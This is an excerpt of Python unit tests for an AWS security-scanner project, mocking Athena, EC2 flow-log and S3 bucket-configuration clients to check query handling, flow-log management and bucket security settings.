def test_wait_for_completion_timeout(self) -> None:
query_id = "9837-4857-3576"
mock_has_query_completed = Mock(return_value=False)
with patch(
"src.clients.aws_athena_async_client.AwsAthenaAsyncClient.has_query_completed", mock_has_query_completed
):
with self.assertRaises(exceptions.TimeoutException) as ex:
AwsAthenaClient(Mock())._wait_for_completion(query_id, 30)
mock_has_query_completed.assert_has_calls([call(query_id) for _ in range(30)])
self.assertIn(query_id, ex.exception.args[0])
def test_wait_for_success(self) -> None:
query_id = "9847-2919-2284"
timeout = 74
query_results = ["some results"]
mock_wait_for_completion = Mock(return_value=None)
mock_query_succeeded = Mock(return_value=True)
mock_query_results = Mock(return_value=query_results)
with patch("src.clients.aws_athena_client.AwsAthenaClient._wait_for_completion", mock_wait_for_completion):
with patch(
"src.clients.aws_athena_async_client.AwsAthenaAsyncClient.has_query_succeeded", mock_query_succeeded
):
with patch(
"src.clients.aws_athena_async_client.AwsAthenaAsyncClient.get_query_results", mock_query_results
):
actual_results = AwsAthenaClient(Mock())._wait_for_success(query_id, timeout, Exception)
self.assertEqual(query_results, actual_results)
mock_wait_for_completion.assert_called_once_with(query_id, timeout)
mock_query_succeeded.assert_called_once_with(query_id)
def test_wait_for_success_query_does_not_succeed(self) -> None:
mock_wait_for_completion = Mock(return_value=None)
mock_query_succeeded = Mock(return_value=False)
query_error = "the query failed for some reasons"
mock_get_query_error = Mock(return_value=query_error)
with patch("src.clients.aws_athena_client.AwsAthenaClient._wait_for_completion", mock_wait_for_completion):
with patch(
"src.clients.aws_athena_async_client.AwsAthenaAsyncClient.has_query_succeeded", mock_query_succeeded
):
with patch(
"src.clients.aws_athena_async_client.AwsAthenaAsyncClient.get_query_error", mock_get_query_error
):
with self.assertRaises(exceptions.RunQueryException) as ex:
AwsAthenaClient(Mock())._wait_for_success("9847-2919-2284", 74, exceptions.RunQueryException)
self.assertIn(query_error, ex.exception.args)
@patch("src.clients.aws_athena_client.AwsAthenaClient._wait_for_success")
class TestQueries(TestCase):
def test_create_database(self, mock_wait_for_success: Mock) -> None:
self.assert_wait_for_success(
mock_wait_for_success=mock_wait_for_success,
method_under_test="create_database",
method_args={"database_name": "some_db_name"},
timeout_seconds=1200,
raise_on_failure=exceptions.CreateDatabaseException,
)
def test_drop_database(self, mock_wait_for_success: Mock) -> None:
self.assert_wait_for_success(
mock_wait_for_success=mock_wait_for_success,
method_under_test="drop_database",
method_args={"database_name": "some_db_name"},
timeout_seconds=1200,
raise_on_failure=exceptions.DropDatabaseException,
)
def test_create_table(self, mock_wait_for_success: Mock) -> None:
self.assert_wait_for_success(
mock_wait_for_success=mock_wait_for_success,
method_under_test="create_table",
method_args={"database": "some_db", "account": account()},
timeout_seconds=1200,
raise_on_failure=exceptions.CreateTableException,
)
def test_drop_table(self, mock_wait_for_success: Mock) -> None:
self.assert_wait_for_success(
mock_wait_for_success=mock_wait_for_success,
method_under_test="drop_table",
method_args={"database": "some_db", "table": "some_account_id"},
timeout_seconds=1200,
raise_on_failure=exceptions.DropTableException,
)
def test_add_partition(self, mock_wait_for_success: Mock) -> None:
self.assert_wait_for_success(
mock_wait_for_success=mock_wait_for_success,
method_under_test="add_partition",
method_args={
"database": "some_db",
"account": account(),
"partition": partition(2020, 8),
},
timeout_seconds=1200,
raise_on_failure=exceptions.AddPartitionException,
)
def test_run_query(self, mock_wait_for_success: Mock) -> None:
self.assert_wait_for_success(
mock_wait_for_success=mock_wait_for_success,
method_under_test="run_query",
method_args={"database": "some_db", "query": "SELECT something FROM somewhere"},
timeout_seconds=1200,
raise_on_failure=exceptions.RunQueryException,
return_results=True,
)
def assert_wait_for_success(
self,
mock_wait_for_success: Mock,
method_under_test: str,
method_args: Dict[str, Any],
timeout_seconds: int,
raise_on_failure: Type[Exception],
return_results: bool = False,
) -> None:
query_id = "1536-4938-3968"
query_results = ["some query results"]
mock_wait_for_success.return_value = query_results
mock_method_under_test = Mock(return_value=query_id)
with patch(f"src.clients.aws_athena_client.AwsAthenaAsyncClient.{method_under_test}", mock_method_under_test):
actual_results = getattr(AwsAthenaClient(Mock()), method_under_test)(**method_args)
mock_method_under_test.assert_called_once_with(**method_args)
mock_wait_for_success.assert_called_once_with(
query_id=query_id,
timeout_seconds=timeout_seconds,
raise_on_failure=raise_on_failure,
)
if return_results:
self.assertEqual(query_results, actual_results)
class TestList(TestCase):
def test_list_databases(self) -> None:
dbs = ["db1", "db2", "db3"]
mock_athena_async = Mock(list_databases=Mock(return_value=dbs))
client = AwsAthenaClient(Mock())
with patch.object(client, "_athena_async", mock_athena_async):
self.assertEqual(dbs, client.list_databases())
def test_list_tables(self) -> None:
tables = ["table1", "table2", "table3"]
mock_athena_async = Mock(list_tables=Mock(side_effect=lambda db: tables if db == "some_database" else []))
client = AwsAthenaClient(Mock())
with patch.object(client, "_athena_async", mock_athena_async):
self.assertEqual(tables, client.list_tables("some_database"))
```
#### File: tests/clients/test_aws_ec2_client.py
```python
import logging
import pytest
from unittest import TestCase
from unittest.mock import Mock, patch
from typing import Any, Dict
from src.clients.aws_ec2_client import AwsEC2Client
from src.data.aws_ec2_types import Vpc
from src.data.aws_scanner_exceptions import EC2Exception
from tests import _raise
from tests.clients import test_aws_ec2_client_responses as responses
from tests.test_types_generator import client_error, flow_log, vpc
def test_list_vpcs() -> None:
ec2 = AwsEC2Client(Mock())
with patch.object(ec2, "_describe_flow_logs", side_effect=lambda v: [flow_log()] if v.id == vpc().id else None):
with patch.object(ec2, "_describe_vpcs", return_value=[vpc()]):
assert [vpc(flow_logs=[flow_log()])] == ec2.list_vpcs()
def test_describe_vpcs_empty() -> None:
ec2_client = AwsEC2Client(Mock(describe_vpcs=Mock(return_value={"Vpcs": []})))
assert [] == ec2_client._describe_vpcs()
def test_describe_vpcs() -> None:
vpcs = [{"VpcId": "vpc-12312e654bf654d12"}, {"VpcId": "vpc-984a4654b65465e12"}]
ec2_client = AwsEC2Client(Mock(describe_vpcs=Mock(return_value={"Vpcs": vpcs})))
assert [Vpc("vpc-12312e654bf654d12"), Vpc("vpc-984a4654b65465e12")] == ec2_client._describe_vpcs()
def test_describe_vpcs_failure(caplog: Any) -> None:
error = client_error("DescribeVpcs", "AccessDenied", "Access Denied")
ec2_client = AwsEC2Client(Mock(describe_vpcs=Mock(side_effect=error)))
with caplog.at_level(logging.INFO):
assert [] == ec2_client._describe_vpcs()
assert "AccessDenied" in caplog.text
def describe_flow_logs(**kwargs: Any) -> Dict[Any, Any]:
assert "resource-id" == kwargs["Filters"][0]["Name"]
flow_log_config = kwargs["Filters"][0]["Values"][0]
if flow_log_config == "vpc-error":
raise client_error("DescribeFlowLogs", "AccessDenied", "Access Denied")
return {
"vpc-no-flow-logs": responses.EMPTY_FLOW_LOGS,
"vpc-with-flow-logs": responses.FLOW_LOGS,
}[flow_log_config]
def ec2_client() -> AwsEC2Client:
return AwsEC2Client(
Mock(
describe_flow_logs=Mock(side_effect=describe_flow_logs), delete_flow_logs=Mock(side_effect=delete_flow_logs)
)
)
def test_describe_flow_logs_empty() -> None:
assert [] == ec2_client()._describe_flow_logs(Vpc("vpc-no-flow-logs"))
def test_describe_flow_logs() -> None:
assert responses.EXPECTED_FLOW_LOGS == ec2_client()._describe_flow_logs(Vpc("vpc-with-flow-logs"))
def test_describe_flow_logs_failure(caplog: Any) -> None:
with caplog.at_level(logging.INFO):
assert [] == ec2_client()._describe_flow_logs(Vpc("vpc-error"))
assert "AccessDenied" in caplog.text
assert "vpc-error" in caplog.text
class TestAwsEC2ClientCreateFlowLogs(TestCase):
EXPECTED_TAGS = [
{
"ResourceType": "vpc-flow-log",
"Tags": [
{"Key": "allow-management-by-platsec-scanner", "Value": "true"},
{"Key": "src-repo", "Value": "https://github.com/hmrc/platsec-aws-scanner"},
],
}
]
def create_flow_logs(self, **kwargs: Any) -> Any:
self.assertEqual("VPC", kwargs["ResourceType"])
self.assertEqual("ALL", kwargs["TrafficType"])
self.assertEqual("cloud-watch-logs", kwargs["LogDestinationType"])
self.assertEqual("${srcaddr} ${dstaddr}", kwargs["LogFormat"])
self.assertEqual(self.EXPECTED_TAGS, kwargs["TagSpecifications"])
self.assertEqual(8, len(kwargs), f"expected 8 arguments passed to create_flow_logs function, got {len(kwargs)}")
resp_mapping: Dict[Any, Any] = {
("good-vpc", "lg-1", "perm-1"): lambda: responses.CREATE_FLOW_LOGS_SUCCESS,
("bad-vpc", "lg-2", "perm-2"): lambda: responses.CREATE_FLOW_LOGS_FAILURE,
("except-vpc", "lg-3", "perm-3"): lambda: _raise(client_error("CreateFlowLogs", "AccessDenied", "nope")),
}
return resp_mapping[(kwargs["ResourceIds"][0], kwargs["LogGroupName"], kwargs["DeliverLogsPermissionArn"])]()
def ec2_client(self) -> AwsEC2Client:
return AwsEC2Client(Mock(create_flow_logs=Mock(side_effect=self.create_flow_logs)))
def test_create_flow_logs(self) -> None:
self.ec2_client().create_flow_logs("good-vpc", "lg-1", "perm-1")
def test_create_flow_logs_failure(self) -> None:
with self.assertRaisesRegex(EC2Exception, "bad-vpc"):
self.ec2_client().create_flow_logs("bad-vpc", "lg-2", "perm-2")
def test_create_flow_logs_client_error(self) -> None:
with self.assertRaisesRegex(EC2Exception, "except-vpc"):
self.ec2_client().create_flow_logs("except-vpc", "lg-3", "perm-3")
def delete_flow_logs(**kwargs: Any) -> Any:
flow_log: Dict[str, Any] = {
"good-fl": lambda: responses.DELETE_FLOW_LOGS_SUCCESS,
"fl-not-found": lambda: responses.DELETE_FLOW_LOGS_FAILURE,
"bad-fl": lambda: _raise(client_error("DeleteFlowLogs", "AccessDenied", "Access Denied")),
}
return flow_log[kwargs["FlowLogIds"][0]]()
def test_delete_flow_logs() -> None:
ec2_client().delete_flow_logs(flow_log_id="good-fl")
def test_delete_flow_logs_not_found() -> None:
with pytest.raises(EC2Exception, match="bad-fl"):
ec2_client().delete_flow_logs(flow_log_id="fl-not-found")
def test_delete_flow_logs_failure() -> None:
with pytest.raises(EC2Exception, match="bad-fl"):
ec2_client().delete_flow_logs(flow_log_id="bad-fl")
```
#### File: tests/clients/test_aws_s3_client.py
```python
import logging
from unittest.mock import Mock
from typing import Any, Dict, Sequence
from src.clients.aws_s3_client import AwsS3Client
from tests import _raise
from tests.clients import test_aws_s3_client_responses as responses
from tests.test_types_generator import (
bucket,
bucket_acl,
bucket_content_deny,
bucket_cors,
bucket_data_tagging,
bucket_encryption,
bucket_lifecycle,
bucket_logging,
bucket_mfa_delete,
bucket_public_access_block,
bucket_secure_transport,
bucket_versioning,
client_error,
)
def test_list_buckets() -> None:
client = AwsS3Client(Mock(list_buckets=Mock(return_value=responses.LIST_BUCKETS)))
expected_buckets = [bucket("a-bucket"), bucket("another-bucket")]
assert expected_buckets == client.list_buckets()
def get_bucket_acl(**kwargs: Dict[str, Any]) -> Any:
bucket = str(kwargs["Bucket"])
if bucket == "access-denied":
raise client_error("GetBucketAcl", "AccessDenied", "Access Denied")
acl: Dict[str, Any] = {
"no-grant": responses.GET_BUCKET_ACL_NO_GRANT,
"owner-grant": responses.GET_BUCKET_ACL_OWNER_GRANT,
"all-users-grant": responses.GET_BUCKET_ACL_ALL_USERS_GRANT,
"authenticated-users-grant": responses.GET_BUCKET_ACL_AUTHENTICATED_USERS_GRANT,
}
return acl[bucket]
def s3_client_acl() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_acl=Mock(side_effect=get_bucket_acl)))
def test_get_bucket_acl_no_grant() -> None:
acl = bucket_acl(all_users_enabled=False, authenticated_users_enabled=False)
assert acl == s3_client_acl().get_bucket_acl("no-grant")
def test_get_bucket_acl_owner_grant() -> None:
acl = bucket_acl(all_users_enabled=False, authenticated_users_enabled=False)
assert acl == s3_client_acl().get_bucket_acl("owner-grant")
def test_get_bucket_acl_all_users_grant() -> None:
acl = bucket_acl(all_users_enabled=True, authenticated_users_enabled=False)
assert acl == s3_client_acl().get_bucket_acl("all-users-grant")
def test_get_bucket_acl_authenticated_users_grant() -> None:
acl = bucket_acl(all_users_enabled=False, authenticated_users_enabled=True)
assert acl == s3_client_acl().get_bucket_acl("authenticated-users-grant")
def test_get_bucket_acl_failure(caplog: Any) -> None:
acl = bucket_acl(all_users_enabled=True, authenticated_users_enabled=True)
with caplog.at_level(logging.WARNING):
assert acl == s3_client_acl().get_bucket_acl("access-denied")
assert "AccessDenied" in caplog.text
def get_bucket_policy(**kwargs: Dict[str, Any]) -> Any:
bucket_config = str(kwargs["Bucket"])
if bucket_config == "access-denied":
raise client_error("GetBucketPolicy", "AccessDenied", "Access Denied")
policy_mapping: Dict[str, Any] = {
"deny-single": responses.GET_BUCKET_POLICY_DENY_GET_PUT_DELETE_SINGLE_STATEMENT,
"deny-separate": responses.GET_BUCKET_POLICY_DENY_GET_PUT_DELETE_SEPARATE_STATEMENTS,
"deny-mixed": responses.GET_BUCKET_POLICY_DENY_GET_PUT_DELETE_MIXED_STATEMENTS,
"deny-incomplete": responses.GET_BUCKET_POLICY_DENY_GET_PUT_SINGLE_STATEMENT,
"deny-incomplete-separate": responses.GET_BUCKET_POLICY_DENY_GET_DELETE_SEPARATE_STATEMENTS,
"deny-incomplete-mixed": responses.GET_BUCKET_POLICY_DENY_PUT_DELETE_MIXED_STATEMENTS,
"allow-mixed": responses.GET_BUCKET_POLICY_ALLOW_GET_PUT_DELETE_MIXED_STATEMENTS,
"deny-other": responses.GET_BUCKET_POLICY_DENY_OTHER,
}
return policy_mapping[bucket_config]
def s3_client_bucket_content() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_policy=Mock(side_effect=get_bucket_policy)))
def test_get_bucket_content_deny_single() -> None:
content_deny = bucket_content_deny(enabled=True)
assert content_deny == s3_client_bucket_content().get_bucket_content_deny("deny-single")
def test_get_bucket_content_deny_separate() -> None:
content_deny = bucket_content_deny(enabled=True)
assert content_deny == s3_client_bucket_content().get_bucket_content_deny("deny-separate")
def test_get_bucket_content_deny_mixed() -> None:
content_deny = bucket_content_deny(enabled=True)
assert content_deny == s3_client_bucket_content().get_bucket_content_deny("deny-mixed")
def test_get_bucket_content_deny_incomplete() -> None:
content_deny = bucket_content_deny(enabled=False)
assert content_deny == s3_client_bucket_content().get_bucket_content_deny("deny-incomplete")
def test_get_bucket_content_deny_incomplete_separate() -> None:
content_deny = bucket_content_deny(enabled=False)
assert content_deny == s3_client_bucket_content().get_bucket_content_deny("deny-incomplete-separate")
def test_get_bucket_content_deny_incomplete_mixed() -> None:
content_deny = bucket_content_deny(enabled=False)
assert content_deny == s3_client_bucket_content().get_bucket_content_deny("deny-incomplete-mixed")
def test_get_bucket_content_deny_allow_mixed() -> None:
content_deny = bucket_content_deny(enabled=False)
assert content_deny == s3_client_bucket_content().get_bucket_content_deny("allow-mixed")
def test_get_bucket_content_deny_other() -> None:
content_deny = bucket_content_deny(enabled=False)
assert content_deny == s3_client_bucket_content().get_bucket_content_deny("deny-other")
def test_get_bucket_content_deny_failure(caplog: Any) -> None:
content_deny = bucket_content_deny(enabled=False)
with caplog.at_level(logging.WARNING):
assert content_deny == s3_client_bucket_content().get_bucket_content_deny("access-denied")
assert "AccessDenied" in caplog.text
def get_bucket_cors(**kwargs: Dict[str, Any]) -> Any:
cors: Dict[Any, Any] = {
"cors-enabled": lambda: responses.GET_BUCKET_CORS_ENABLED,
"cors-disabled": lambda: _raise(
client_error("GetBucketCors", "NoSuchCORSConfiguration", "The CORS configuration does not exist")
),
"access-denied": lambda: _raise(client_error("GetBucketCors", "AccessDenied", "Access Denied")),
}
return cors[kwargs["Bucket"]]()
def s3_client_cors() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_cors=Mock(side_effect=get_bucket_cors)))
def test_get_bucket_cors_enabled() -> None:
cors = bucket_cors(enabled=True)
assert cors == s3_client_cors().get_bucket_cors("cors-enabled")
def test_get_bucket_cors_disabled() -> None:
cors = bucket_cors(enabled=False)
assert cors == s3_client_cors().get_bucket_cors("cors-disabled")
def test_get_bucket_cors_failure(caplog: Any) -> None:
cors = bucket_cors(enabled=True)
with caplog.at_level(logging.WARNING):
assert cors == s3_client_cors().get_bucket_cors("access-denied")
assert "AccessDenied" in caplog.text
def get_bucket_expiry_tagging(**kwargs: Dict[str, str]) -> Any:
expiry_config = str(kwargs["Bucket"])
if expiry_config == "no-tag":
raise client_error("GetBucketTagging", "NoSuchTagSet", "The TagSet does not exist")
expiry: Dict[Any, Any] = {
"expiry-1-week": responses.GET_BUCKET_TAGGING_EXPIRY_1_WEEK,
"expiry-1-month": responses.GET_BUCKET_TAGGING_EXPIRY_1_MONTH,
"expiry-90-days": responses.GET_BUCKET_TAGGING_EXPIRY_90_DAYS,
"expiry-6-months": responses.GET_BUCKET_TAGGING_EXPIRY_6_MONTHS,
"expiry-1-year": responses.GET_BUCKET_TAGGING_EXPIRY_1_YEAR,
"expiry-7-years": responses.GET_BUCKET_TAGGING_EXPIRY_7_YEARS,
"expiry-10-years": responses.GET_BUCKET_TAGGING_EXPIRY_10_YEARS,
"expiry-unknown": responses.GET_BUCKET_TAGGING_EXPIRY_UNKNOWN,
"no-expiry": responses.GET_BUCKET_TAGGING_NO_EXPIRY,
}
return expiry[expiry_config]
def s3_client_expiry_tagging() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_tagging=Mock(side_effect=get_bucket_expiry_tagging)))
def test_get_bucket_data_tagging_expiry_1_week() -> None:
tagging = bucket_data_tagging(expiry="1-week")
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("expiry-1-week")
def test_get_bucket_data_tagging_expiry_1_month() -> None:
tagging = bucket_data_tagging(expiry="1-month")
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("expiry-1-month")
def test_get_bucket_data_tagging_expiry_90_days() -> None:
tagging = bucket_data_tagging(expiry="90-days")
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("expiry-90-days")
def test_get_bucket_data_tagging_expiry_6_months() -> None:
tagging = bucket_data_tagging(expiry="6-months")
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("expiry-6-months")
def test_get_bucket_data_tagging_expiry_1_year() -> None:
tagging = bucket_data_tagging(expiry="1-year")
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("expiry-1-year")
def test_get_bucket_data_tagging_expiry_7_years() -> None:
tagging = bucket_data_tagging(expiry="7-years")
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("expiry-7-years")
def test_get_bucket_data_tagging_expiry_10_years() -> None:
tagging = bucket_data_tagging(expiry="10-years")
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("expiry-10-years")
def test_get_bucket_data_tagging_expiry_unknown() -> None:
tagging = bucket_data_tagging(expiry="unset")
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("expiry-unknown")
def test_get_bucket_data_tagging_no_expiry() -> None:
tagging = bucket_data_tagging(expiry="unset")
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("no-expiry")
def test_get_bucket_data_tagging_expiry_failure(caplog: Any) -> None:
tagging = bucket_data_tagging(expiry="unset")
with caplog.at_level(logging.WARNING):
assert tagging == s3_client_expiry_tagging().get_bucket_data_tagging("no-tag")
assert "NoSuchTagSet" in caplog.text
def get_bucket_sensitivity_tagging(**kwargs: Dict[str, Any]) -> Any:
bucket_tag_config: str = str(kwargs["Bucket"])
if bucket_tag_config == "no-tag":
raise client_error("GetBucketTagging", "NoSuchTagSet", "The TagSet does not exist")
tags: Dict[str, Any] = {
"low-sensitivity": responses.GET_BUCKET_TAGGING_LOW_SENSITIVITY,
"high-sensitivity": responses.GET_BUCKET_TAGGING_HIGH_SENSITIVITY,
"unknown-sensitivity": responses.GET_BUCKET_TAGGING_UNKNOWN_SENSITIVITY,
"no-sensitivity": responses.GET_BUCKET_TAGGING_NO_SENSITIVITY,
}
return tags[bucket_tag_config]
def s3_client_sensitivity_tagging() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_tagging=Mock(side_effect=get_bucket_sensitivity_tagging)))
def test_get_bucket_data_sensitivity_tagging_low() -> None:
tagging = bucket_data_tagging(sensitivity="low")
assert tagging == s3_client_sensitivity_tagging().get_bucket_data_tagging("low-sensitivity")
def test_get_bucket_data_sensitivity_tagging_high() -> None:
tagging = bucket_data_tagging(sensitivity="high")
assert tagging == s3_client_sensitivity_tagging().get_bucket_data_tagging("high-sensitivity")
def test_get_bucket_data_sensitivity_tagging_unknown() -> None:
tagging = bucket_data_tagging(sensitivity="unset")
assert tagging, s3_client_sensitivity_tagging().get_bucket_data_tagging("unknown-sensitivity")
def test_get_bucket_data_sensitivity_no_sensitivity() -> None:
tagging = bucket_data_tagging(sensitivity="unset")
assert tagging == s3_client_sensitivity_tagging().get_bucket_data_tagging("no-sensitivity")
def test_get_bucket_data_sensitivity_tagging_failure(caplog: Any) -> None:
tagging = bucket_data_tagging(sensitivity="unset")
with caplog.at_level(logging.WARNING):
assert tagging == s3_client_sensitivity_tagging().get_bucket_data_tagging("no-tag")
assert "NoSuchTagSet" in caplog.text
def get_bucket_encryption(**kwargs: Dict[str, Any]) -> Any:
buck = str(kwargs["Bucket"])
if buck == "bad-bucket":
raise client_error(
"GetBucketEncryption",
"ServerSideEncryptionConfigurationNotFoundError",
"The server side encryption configuration was not found",
)
encryption_mapping: Dict[str, Any] = {
"cmk-bucket": responses.GET_BUCKET_ENCRYPTION_CMK,
"managed-bucket": responses.GET_BUCKET_ENCRYPTION_AWS_MANAGED,
"aes-bucket": responses.GET_BUCKET_ENCRYPTION_AES,
"keyless-bucket": responses.GET_BUCKET_ENCRYPTION_KEYLESS,
}
return encryption_mapping[buck]
def s3_client_encryption() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_encryption=Mock(side_effect=get_bucket_encryption)))
def test_get_bucket_encryption_cmk() -> None:
encryption = bucket_encryption(enabled=True, type="cmk")
assert encryption == s3_client_encryption().get_bucket_encryption("cmk-bucket")
def test_get_bucket_encryption_aws_managed() -> None:
encryption = bucket_encryption(enabled=True, type="aws")
assert encryption == s3_client_encryption().get_bucket_encryption("managed-bucket")
def test_get_bucket_encryption_aes() -> None:
encryption = bucket_encryption(enabled=True, type="aes")
assert encryption == s3_client_encryption().get_bucket_encryption("aes-bucket")
def test_get_bucket_encryption_keyless() -> None:
encryption = bucket_encryption(enabled=True, type="aws")
assert encryption == s3_client_encryption().get_bucket_encryption("keyless-bucket")
def test_get_bucket_encryption_not_encrypted(caplog: Any) -> None:
with caplog.at_level(logging.WARNING):
assert bucket_encryption(enabled=False) == s3_client_encryption().get_bucket_encryption("bad-bucket")
assert "ServerSideEncryptionConfigurationNotFoundError" in caplog.text
def get_bucket_logging(**kwargs: Dict[str, Any]) -> Any:
buck = str(kwargs["Bucket"])
if buck == "denied-bucket":
raise client_error("GetBucketLogging", "AccessDenied", "Access Denied")
logging_mapping = {
"logging-enabled-bucket": responses.GET_BUCKET_LOGGING_ENABLED,
"logging-disabled-bucket": responses.GET_BUCKET_LOGGING_DISABLED,
}
return logging_mapping[buck]
def s3_client_logging() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_logging=Mock(side_effect=get_bucket_logging)))
def test_get_bucket_logging_enabled() -> None:
assert bucket_logging(enabled=True) == s3_client_logging().get_bucket_logging("logging-enabled-bucket")
def test_get_bucket_logging_disabled() -> None:
assert bucket_logging(enabled=False) == s3_client_logging().get_bucket_logging("logging-disabled-bucket")
def test_get_bucket_logging_failure(caplog: Any) -> None:
with caplog.at_level(logging.WARNING):
assert bucket_logging(enabled=False) == s3_client_logging().get_bucket_logging("denied-bucket")
assert "AccessDenied" in caplog.text
def get_bucket_lifecycle(**kwargs: Dict[str, Any]) -> Any:
buck = str(kwargs["Bucket"])
if buck == "no-lifecycle":
raise client_error(
"GetBucketLifecycleConfiguration",
"NoSuchLifecycleConfiguration",
"The lifecycle configuration does not exist",
)
lifecycle_mapping: Dict[str, Any] = {
"single-rule": responses.GET_BUCKET_LIFECYCLE_CONFIGURATION_SINGLE_RULE,
"multiple-rules": responses.GET_BUCKET_LIFECYCLE_CONFIGURATION_MULTIPLE_RULES,
"disabled": responses.GET_BUCKET_LIFECYCLE_CONFIGURATION_DISABLED,
"no-expiry": responses.GET_BUCKET_LIFECYCLE_CONFIGURATION_NO_EXPIRY,
}
return lifecycle_mapping[buck]
def s3_client_lifecycle() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_lifecycle_configuration=Mock(side_effect=get_bucket_lifecycle)))
def test_get_bucket_lifecycle_single_rule() -> None:
lifecycle = bucket_lifecycle(current_version_expiry=15, previous_version_deletion=30)
assert lifecycle == s3_client_lifecycle().get_bucket_lifecycle("single-rule")
def test_get_bucket_lifecycle_multiple_rules() -> None:
lifecycle = bucket_lifecycle(current_version_expiry=5, previous_version_deletion=10)
assert lifecycle == s3_client_lifecycle().get_bucket_lifecycle("multiple-rules")
def test_get_bucket_lifecycle_disabled() -> None:
lifecycle = bucket_lifecycle(current_version_expiry="unset", previous_version_deletion="unset")
assert lifecycle == s3_client_lifecycle().get_bucket_lifecycle("disabled")
def test_get_bucket_lifecycle_no_expiry() -> None:
lifecycle = bucket_lifecycle(current_version_expiry="unset", previous_version_deletion="unset")
assert lifecycle == s3_client_lifecycle().get_bucket_lifecycle("no-expiry")
def test_get_bucket_lifecycle_not_set(caplog: Any) -> None:
lifecycle = bucket_lifecycle(current_version_expiry="unset", previous_version_deletion="unset")
with caplog.at_level(logging.WARNING):
assert lifecycle == s3_client_lifecycle().get_bucket_lifecycle("no-lifecycle")
assert "NoSuchLifecycleConfiguration" in caplog.text
def get_bucket_mfa(**kwargs: Dict[str, Any]) -> Any:
buck = str(kwargs["Bucket"])
if buck == "access-denied":
raise client_error("GetBucketVersioning", "AccessDenied", "Access Denied")
versioning_mapping: Dict[str, Any] = {
"mfa-delete-enabled": responses.GET_BUCKET_VERSIONING_MFA_DELETE_ENABLED,
"mfa-delete-disabled": responses.GET_BUCKET_VERSIONING_MFA_DELETE_DISABLED,
"mfa-delete-unset": responses.GET_BUCKET_VERSIONING_MFA_DELETE_UNSET,
}
return versioning_mapping[buck]
def s3_client_mfa() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_versioning=Mock(side_effect=get_bucket_mfa)))
def test_get_bucket_mfa_delete_enabled() -> None:
mfa_delete = bucket_mfa_delete(enabled=True)
assert mfa_delete == s3_client_mfa().get_bucket_mfa_delete("mfa-delete-enabled")
def test_get_bucket_mfa_delete_disabled() -> None:
mfa_delete = bucket_mfa_delete(enabled=False)
assert mfa_delete == s3_client_mfa().get_bucket_mfa_delete("mfa-delete-disabled")
def test_get_bucket_mfa_delete_unset() -> None:
mfa_delete = bucket_mfa_delete(enabled=False)
assert mfa_delete == s3_client_mfa().get_bucket_mfa_delete("mfa-delete-unset")
def test_get_bucket_mfa_delete_failure(caplog: Any) -> None:
mfa_delete = bucket_mfa_delete(enabled=False)
with caplog.at_level(logging.WARNING):
assert mfa_delete == s3_client_mfa().get_bucket_mfa_delete("access-denied")
assert "AccessDenied" in caplog.text
def s3_client_pab(public_access_block_response: Dict[str, Any]) -> AwsS3Client:
return AwsS3Client(
Mock(
get_public_access_block=Mock(
side_effect=lambda **kwargs: public_access_block_response
if kwargs.get("Bucket") == "bucket"
else _raise(client_error("GetPublicAccessBlock", "AccessDenied", "Access Denied")),
)
)
)
def test_get_bucket_public_access_block() -> None:
blocked = bucket_public_access_block(enabled=True)
not_blocked = bucket_public_access_block(enabled=False)
scenarios: Sequence[Dict[str, Any]] = [
{"response": responses.public_access_block(False, False, False, False), "state": not_blocked},
{"response": responses.public_access_block(False, False, False, True), "state": not_blocked},
{"response": responses.public_access_block(False, False, True, False), "state": not_blocked},
{"response": responses.public_access_block(False, True, False, False), "state": not_blocked},
{"response": responses.public_access_block(True, False, False, False), "state": not_blocked},
{"response": responses.public_access_block(False, False, True, True), "state": not_blocked},
{"response": responses.public_access_block(True, True, False, False), "state": not_blocked},
{"response": responses.public_access_block(False, True, False, True), "state": blocked},
{"response": responses.public_access_block(True, False, True, False), "state": not_blocked},
{"response": responses.public_access_block(True, False, False, True), "state": not_blocked},
{"response": responses.public_access_block(False, True, True, False), "state": not_blocked},
{"response": responses.public_access_block(False, True, True, True), "state": blocked},
{"response": responses.public_access_block(True, True, True, False), "state": not_blocked},
{"response": responses.public_access_block(True, True, False, True), "state": blocked},
{"response": responses.public_access_block(True, False, True, True), "state": not_blocked},
{"response": responses.public_access_block(True, True, True, True), "state": blocked},
]
for scenario in scenarios:
assert scenario["state"] == s3_client_pab(scenario["response"]).get_bucket_public_access_block("bucket")
def test_get_bucket_public_access_block_failure(caplog: Any) -> None:
not_blocked = bucket_public_access_block(enabled=False)
with caplog.at_level(logging.WARNING):
assert not_blocked == s3_client_pab({}).get_bucket_public_access_block("denied")
assert "AccessDenied" in caplog.text
def get_bucket_secure_transport(**kwargs: Dict[str, Any]) -> Any:
buck = str(kwargs["Bucket"])
if buck == "denied":
raise client_error("GetBucketPolicy", "AccessDenied", "Access Denied")
policy_mapping: Dict[str, Any] = {
"bucket": responses.GET_BUCKET_POLICY,
"secure-bucket": responses.GET_BUCKET_POLICY_SECURE_TRANSPORT,
}
return policy_mapping[buck]
def s3_client_secure_transport() -> AwsS3Client:
return AwsS3Client(Mock(get_bucket_policy=Mock(side_effect=get_bucket_secure_transport)))
def test_get_bucket_secure_transport_disabled() -> None:
secure_transport = bucket_secure_transport(enabled=False)
assert secure_transport == s3_client_secure_transport().get_bucket_secure_transport("bucket")
def test_get_bucket_secure_transport_enabled() -> None:
secure_transport = bucket_secure_transport(enabled=True)
assert secure_transport == s3_client_secure_transport().get_bucket_secure_transport("secure-bucket")
def test_get_bucket_secure_transport_failure(caplog: Any) -> None:
secure_transport = bucket_secure_transport(enabled=False)
